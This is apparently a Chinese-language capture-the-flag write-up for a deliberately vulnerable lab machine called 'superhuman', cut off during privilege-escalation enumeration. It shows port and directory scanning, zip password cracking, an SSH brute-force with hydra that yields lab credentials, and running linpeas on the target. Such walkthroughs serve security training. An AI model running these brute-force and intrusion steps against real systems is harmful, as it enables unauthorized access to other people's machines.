![\"image-20240411114812462\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311992.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nnmap -sCV -p 1-65535 172.20.10.5<\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 9e:41:5a:43:d8:b3:31:18:0f:2e:32:36:cf:68:c4:b7 (RSA)\n| 256 6f:24:81:b4:3d:e5:b9:c8:47:bf:b2:8b:bf:41:2d:51 (ECDSA)\n|_ 256 49:5f:c0:7a:42:20:76:76:d5:29:1a:65:bf:87:d2:24 (ED25519)\n80\/tcp open http Apache httpd 2.4.38 ((Debian))\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: Apache\/2.4.38 (Debian)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.5 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n\/server-status (Status: 403) [Size: 276]\nProgress: 1543920 \/ 1543927 (100.00%)<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.5<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.5\n+ Target Hostname: 172.20.10.5\n+ Target Port: 80\n+ Start Time: 2024-04-10 23:51:04 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.38 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: 292, size: 5bed1a5d204c0, mtime: gzip. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ Apache\/2.4.38 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host\n+ End Time: 2024-04-10 23:51:28 (GMT-4) (24 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u8e29\u70b9<\/h3>\n<html><head>\n<meta http-equiv="content-type" content="text\/html; charset=windows-1252"><\/head><body><p><img src="index_fichiers\/nietzsche.jpg" alt="" style="display: block; margin-left: auto; margin-right: auto;"><\/p>\n<!--\u62c9\u5230\u6700\u5e95\u4e0b-->\n<!-- If your eye was sharper, you would see everything in motion, lol -->\n<\/body><\/html><\/code><\/pre>\n\u6ca1\u5565\u4e1c\u897f\u4e86\uff0c\u5bb3\u3002\u770b\u4e00\u4e0b\u8fd9\u4e2a\u56fe\u7247\uff1a<\/p>\n
http:\/\/172.20.10.5\/nietzsche.jpg<\/code><\/pre>\n![\"image-20240411115551882\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u5c3c\u91c7\u5417\uff1f\u4e0b\u8f7d\u4e0b\u6765\uff0c\u770b\u770b\u6709\u65e0\u9690\u5199\uff1a<\/p>\n
<\/div><\/p>\n\u4f3c\u4e4e\u6709\uff0c\u4f46\u662f\u6211\u4eec\u5b57\u5178\u7206\u7834\u4e0d\u51fa\u6765\uff0c\u7b49\u4e00\u4e0b\uff0c\u5148\u540e\u53f0fuzz\u4e00\u4e0b\u76ee\u5f55\uff0c\u5c1d\u8bd5\u522b\u7684\u5b57\u5178\uff1a<\/p>\n
\u6ca1\u6709\u627e\u5230\u53ef\u4ee5fuzz\u51fa\u6765\u7684\u5b57\u5178\u3002\u3002\u3002\u3002<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u5c1d\u8bd5FUZZ\u4e00\u4e0b\u76ee\u5f55\uff1a<\/p>\n
ffuf -u http:\/\/172.20.10.5\/FUZZ -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt -e php,txt,zip<\/code><\/pre>\n\u95f2\u7740\u7684\u65f6\u5019\u7d22\u6027\u62ffgobuster<\/code>\u6362\u4e86\u4e2a\u5b57\u5178\u91cd\u65b0\u626b\u4e86\u4e00\u4e0b\uff1a<\/p>\ngobuster dir -u http:\/\/172.20.10.5 -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt -x php,zip,git,jpg,txt<\/code><\/pre>\nfuzz\u7ed3\u679c\uff1a<\/p>\n
server-status [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 26ms]<\/code><\/pre>\ngobuster<\/code>\u626b\u51fa\u4e86\u4e1c\u897f\uff01<\/p>\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/172.20.10.5\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: txt,php,zip,git,jpg\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/server-status (Status: 403) [Size: 276]\n\/notes-tips.txt (Status: 200) [Size: 358]\n\/nietzsche.jpg (Status: 200) [Size: 22211]\nProgress: 7642998 \/ 7643004 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u67e5\u5230\u4e1c\u897f\u4e22\u5230cyberchef<\/code>\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\nhttp:\/\/172.20.10.5\/notes-tips.txt\nF(&m'D.Oi#De4!--ZgJT@;^00D.P7@8LJ?tF)N1B@:UuC\/g+jUD'3nBEb-A+De'u)F!,")@:UuC\/g(Km+CoM$DJL@Q+Dbb6ATDi7De:+g@<HBpDImi@\/hSb!FDl(?A9)g1CERG3Cb?i%-Z!TAGB.D>AKYYtEZed5E,T<)+CT.u+EM4--Z!TAA7]grEb-A1AM,)s-Z!TADIIBn+DGp?F(&m'D.R'_DId*=59NN?A8c?5F<G@:Dg*f@$:u@WF`VXIDJsV>AoD^&ATT&:D]j+0G%De1F<G"0A0>i6F<G!7B5_^!+D#e>ASuR'Df-\\,ARf.kF(HIc+CoD.-ZgJE@<Q3)D09?%+EMXCEa`Tl\/c<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\nsalome doesn't want me, I'm so sad... i'm sure god is dead... \nI drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and she'll desire me. I'll name it salome_and_?? I don't know.\n\nI must not forget to save it and put a good extension because I don't have much storage.<\/code><\/pre>\n\u5f97\u5230\u654f\u611f\u76ee\u5f55\uff1asalome_and_me.zip<\/code><\/p>\n\n\u56e0\u4e3a\u540e\u9762\u63d0\u5230\u6ca1\u6709\u592a\u591a\u5185\u5b58\u4e86\u3002<\/p>\n<\/blockquote>\n
\u8bf7\u6c42\u4e00\u4e0b\u6587\u4ef6\uff1a<\/p>\n
wget http:\/\/172.20.10.5\/salome_and_me.zip<\/code><\/pre>\n<\/div><\/p>\n\u7206\u7834\u51fa\u6765\u4e86\uff01<\/p>\n
turtle<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/superhuman]\n\u2514\u2500$ cat salome_and_me.txt \n----------------------------------------------------\n GREAT POEM FOR SALOME\n----------------------------------------------------\nMy name is fred,\nAnd tonight I'm sad, lonely and scared,\nBecause my love Salome prefers schopenhauer, asshole,\nI hate him he's stupid, ugly and a peephole,\nMy darling I offered you a great switch,\nAnd now you reject my love, bitch\nI don't give a fuck, I'll go with another lady,\nAnd she'll call me BABY!<\/code><\/pre>\n\u7b11\u6b7b\u4e86\uff0c\u597d\u60e8\u554a\u3002<\/p>\n
fred\nSalome\nschopenhauer<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
echo "fred\\nSalome\\nschopenhauer" > fuck.txt<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/superhuman]\n\u2514\u2500$ hydra -L fuck.txt -P fuck.txt ssh:\/\/172.20.10.5 \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-11 00:49:08\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3\/p:3), ~1 try per task\n[DATA] attacking ssh:\/\/172.20.10.5:22\/\n[22][ssh] host: 172.20.10.5 login: fred password: schopenhauer\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-11 00:49:13<\/code><\/pre>\nfred\nschopenhauer<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) fred@superhuman:\/home\/fred$ whoami;id\nfred\nuid=1000(fred) gid=1000(fred) groups=1000(fred),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n(remote) fred@superhuman:\/home\/fred$ pwd\n\/home\/fred\n(remote) fred@superhuman:\/home\/fred$ ls -la\nlol<\/code><\/pre>\n\u7136\u540e\u5c31\u9000\u51fa\u6765\u4e86\uff0c\u7eb3\u5c3c\uff0c\u4e0d\u80fd\u7528ls \uff1f<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/superhuman]\n\u2514\u2500$ pwncat-cs fred@172.20.10.5 2>\/dev\/null\n[00:52:46] Welcome to pwncat \ud83d\udc08! __main__.py:164\nPassword: ************\n[00:52:47] 172.20.10.5:22: normalizing shell path manager.py:957 172.20.10.5:22: registered new host w\/ db manager.py:957\n(local) pwncat$ \n(remote) fred@superhuman:\/home\/fred$ cat user.txt \nIneedmorepower\n(remote) fred@superhuman:\/home\/fred$ echo *\ncmd.txt user.txt\n(remote) fred@superhuman:\/home\/fred$ cat cmd.txt \n"ls" command has a new name ?!! WTF !\n(remote) fred@superhuman:\/home\/fred$ WTF -la\n-bash: WTF: command not found\n(remote) fred@superhuman:\/home\/fred$ find \/-perm -u=s -type f 2>\/dev\/null\n(remote) fred@superhuman:\/home\/fred$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/passwd\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/mount\n\/usr\/bin\/umount\n\/usr\/bin\/chfn<\/code><\/pre>\n\u4e0a\u4f20linpeas.sh<\/code>\u901f\u901a\u4e00\u4e0b\uff1a<\/p>\n(remote) fred@superhuman:\/home\/fred$ cd \/tmp\n(remote) fred@superhuman:\/tmp$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/superhuman\n(local) pwncat$ lcd ..\n(local) pwncat$ upload linpeas.sh\n.\/linpeas.sh \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 860.5\/860.5 KB \u2022 ? \u2022 0:00:00[00:59:10] uploaded 860.55KiB in 0.71 seconds upload.py:76\n(local) pwncat$ \n(remote) fred@superhuman:\/tmp$ chmod +x linpeas.sh \n(remote) fred@superhuman:\/tmp$ .\/linpeas.sh \n\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584 \u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\n \u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584 \u2584\n \u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584 \n \u2584\u2584 \u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\n \u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\n \u2584 \u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\n \u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584 \u2584\u2584\n \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2580\u2580\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2580\u2580\u2580\u2580\u2580\u2580\n \u2580\u2580\u2580\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2580\u2580\n \u2580\u2580\u2580\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2580\u2580\u2580\n\n \/---------------------------------------------------------------------------------\\\n | Do you like PEASS? |\n |---------------------------------------------------------------------------------|\n | Get the latest version : https:\/\/github.com\/sponsors\/carlospolop |\n | Follow on Twitter : @hacktricks_live |\n | Respect on HTB : SirBroccoli |\n |---------------------------------------------------------------------------------|\n | Thank you! |\n \\---------------------------------------------------------------------------------\/\n linpeas-ng by carlospolop\n\nADVISORY: This script should be used for authorized penetration testing and\/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and\/or with the computer owner's permission.\n\nLinux Privesc Checklist: https:\/\/book.hacktricks.xyz\/linux-hardening\/linux-privilege-escalation-checklist\n LEGEND:\n RED\/YELLOW: 95% a PE vector\n RED: You should take a look to it\n LightCyan: Users with console\n Blue: Users without console & mounted devs\n Green: Common things (users, groups, SUID\/SGID, mounts, .sh scripts, cronjobs) \n LightMagenta: Your username\n\n Starting linpeas. Caching Writable Folders...\n\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Basic information \u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\nOS: Linux version 4.19.0-16-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.181-1 (2021-03-19)\nUser & Groups: uid=1000(fred) gid=1000(fred) groups=1000(fred),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\nHostname: superhuman\nWritable folder: \/dev\/shm\n[+] \/usr\/bin\/ping is available for network discovery (linpeas can discover hosts, learn more with -h)\n[+] \/usr\/bin\/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)\n[+] \/usr\/bin\/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)\nCaching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 System Information \u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Operative system\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#kernel-exploits\nLinux version 4.19.0-16-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.181-1 (2021-03-19)\nDistributor ID: Debian\nDescription: Debian GNU\/Linux 10 (buster)\nRelease: 10\nCodename: buster\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Sudo version\nsudo Not Found\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 PATH\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#writable-path-abuses\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games:\/sbin:\/usr\/sbin:\/usr\/local\/sbin\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Date & uptime\nThu 11 Apr 2024 12:59:27 AM EDT\n 00:59:27 up 1:13, 1 user, load average: 0.16, 0.39, 2.55\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Any sd*\/disk* disk in \/dev? (limit 20)\nKilled<\/code><\/pre>\n\u554a\u8fd9\u3002\u3002\u3002\u3002\u771f\u662f\u88ab\u901f\u901a\u4e86\u3002\u3002\u3002\u3002<\/p>\n
\u518d\u6b21\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
(remote) fred@superhuman:\/tmp$ echo *\nlinpeas.sh systemd-private-193640687eb64794bc31630a1457f638-apache2.service-0FkQXg systemd-private-193640687eb64794bc31630a1457f638-systemd-timesyncd.service-KTkU3P\n(remote) fred@superhuman:\/tmp$ cd \/\n(remote) fred@superhuman:\/$ echo *\nbin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old\n(remote) fred@superhuman:\/$ cd \/etc\n(remote) fred@superhuman:\/etc$ echo *\nadduser.conf adjtime alternatives apache2 apm apparmor apparmor.d apt bash.bashrc bash_completion bindresvport.blacklist binfmt.d ca-certificates ca-certificates.conf calendar console-setup cron.d cron.daily cron.hourly cron.monthly crontab cron.weekly dbus-1 debconf.conf debian_version default deluser.conf dhcp dictionaries-common discover.conf.d discover-modprobe.conf dpkg emacs environment fstab gai.conf groff group group- grub.d gshadow gshadow- gss hdparm.conf host.conf hostname hosts hosts.allow hosts.deny init.d initramfs-tools inputrc iproute2 issue issue.net kernel kernel-img.conf ldap ld.so.cache ld.so.conf ld.so.conf.d libaudit.conf locale.alias locale.gen localtime logcheck login.defs logrotate.conf logrotate.d machine-id magic magic.mime mailcap mailcap.order manpath.config mime.types mke2fs.conf modprobe.d modules modules-load.d motd mtab nanorc network networks nsswitch.conf opt os-release pam.conf pam.d passwd passwd- perl profile profile.d protocols python python2.7 python3 python3.7 rc0.d rc1.d rc2.d rc3.d rc4.d rc5.d rc6.d rcS.d reportbug.conf resolv.conf rmt rpc rsyslog.conf rsyslog.d securetty security selinux services shadow shadow- shells skel ssh ssl subgid subgid- subuid subuid- sysctl.conf sysctl.d systemd terminfo timezone tmpfiles.d ucf.conf udev ufw update-motd.d vim wgetrc X11 xattr.conf xdg\n(remote) fred@superhuman:\/etc$ cd \/opt;echo *\n*\n(remote) fred@superhuman:\/opt$ echo *\n*\n(remote) fred@superhuman:\/opt$ cd \/var\/www\/html\n(remote) fred@superhuman:\/var\/www\/html$ echo *\nindex.html nietzsche.jpg notes-tips.txt salome_and_me.zip\n(remote) fred@superhuman:\/var\/www\/html$ busybox \nBusyBox v1.30.1 (Debian 1:1.30.1-4) multi-call binary.\nBusyBox is copyrighted by many authors between 1998-2015.\nLicensed under GPLv2. See source distribution for detailed\ncopyright notices.\n\nUsage: busybox [function [arguments]...]\n or: busybox --list[-full]\n or: busybox --show SCRIPT\n or: busybox --install [-s] [DIR]\n or: function [arguments]...\n\n BusyBox is a multi-call binary that combines many common Unix\n utilities into a single executable. Most people will create a\n link to busybox for each function they wish to use and BusyBox\n will act like whatever it was invoked as.\n\nCurrently defined functions:\n [, [[, acpid, adjtimex, ar, arch, arp, arping, ash, awk, basename, bc, blkdiscard, blockdev, brctl, bunzip2, bzcat, bzip2, cal, cat, chgrp,\n chmod, chown, chroot, chvt, clear, cmp, cp, cpio, cttyhack, cut, date, dc, dd, deallocvt, depmod, devmem, df, diff, dirname, dmesg,\n dnsdomainname, dos2unix, du, dumpkmap, dumpleases, echo, egrep, env, expand, expr, factor, fallocate, false, fatattr, fgrep, find, fold, free,\n freeramdisk, fsfreeze, fstrim, ftpget, ftpput, getopt, getty, grep, groups, gunzip, gzip, halt, head, hexdump, hostid, hostname, httpd,\n hwclock, i2cdetect, i2cdump, i2cget, i2cset, id, ifconfig, ifdown, ifup, init, insmod, ionice, ip, ipcalc, ipneigh, kill, killall, klogd, last,\n less, link, linux32, linux64, linuxrc, ln, loadfont, loadkmap, logger, login, logname, logread, losetup, ls, lsmod, lsscsi, lzcat, lzma, lzop,\n md5sum, mdev, microcom, mkdir, mkdosfs, mke2fs, mkfifo, mknod, mkpasswd, mkswap, mktemp, modinfo, modprobe, more, mount, mt, mv, nameif, nc,\n netstat, nl, nologin, nproc, nsenter, nslookup, nuke, od, openvt, partprobe, paste, patch, pidof, ping, ping6, pivot_root, poweroff, printf,\n ps, pwd, rdate, readlink, realpath, reboot, renice, reset, resume, rev, rm, rmdir, rmmod, route, rpm, rpm2cpio, run-init, run-parts, sed, seq,\n setkeycodes, setpriv, setsid, sh, sha1sum, sha256sum, sha512sum, shred, shuf, sleep, sort, ssl_client, start-stop-daemon, stat, strings, stty,\n svc, svok, swapoff, swapon, switch_root, sync, sysctl, syslogd, tac, tail, tar, taskset, tee, telnet, test, tftp, time, timeout, top, touch,\n tr, traceroute, traceroute6, true, truncate, tty, ubirename, udhcpc, udhcpd, uevent, umount, uname, uncompress, unexpand, uniq, unix2dos,\n unlink, unlzma, unshare, unxz, unzip, uptime, usleep, uudecode, uuencode, vconfig, vi, w, watch, watchdog, wc, wget, which, who, whoami, xargs,\n xxd, xz, xzcat, yes, zcat\n(remote) fred@superhuman:\/var\/www\/html$ busybox ls\nindex.html nietzsche.jpg notes-tips.txt salome_and_me.zip\n(remote) fred@superhuman:\/var\/www\/html$ busybox ls -la\ntotal 44\ndrwxrwxrwx 2 www-data www-data 4096 Mar 31 2021 .\ndrwxrwxrwx 3 www-data www-data 4096 Mar 31 2021 ..\n-rwxrwxrwx 1 www-data www-data 658 Mar 31 2021 index.html\n-rwxrwxrwx 1 www-data www-data 22211 Mar 31 2021 nietzsche.jpg\n-rwxrwxrwx 1 www-data www-data 358 Mar 31 2021 notes-tips.txt\n-rwxrwxrwx 1 www-data www-data 452 Mar 31 2021 salome_and_me.zip\n(remote) fred@superhuman:\/var\/www\/html$ cd ..\/;\n(remote) fred@superhuman:\/var\/www$ cd \/\n(remote) fred@superhuman:\/$ sudo -l\n-bash: sudo: command not found\n(remote) fred@superhuman:\/$ busybox sudo -l\nsudo: applet not 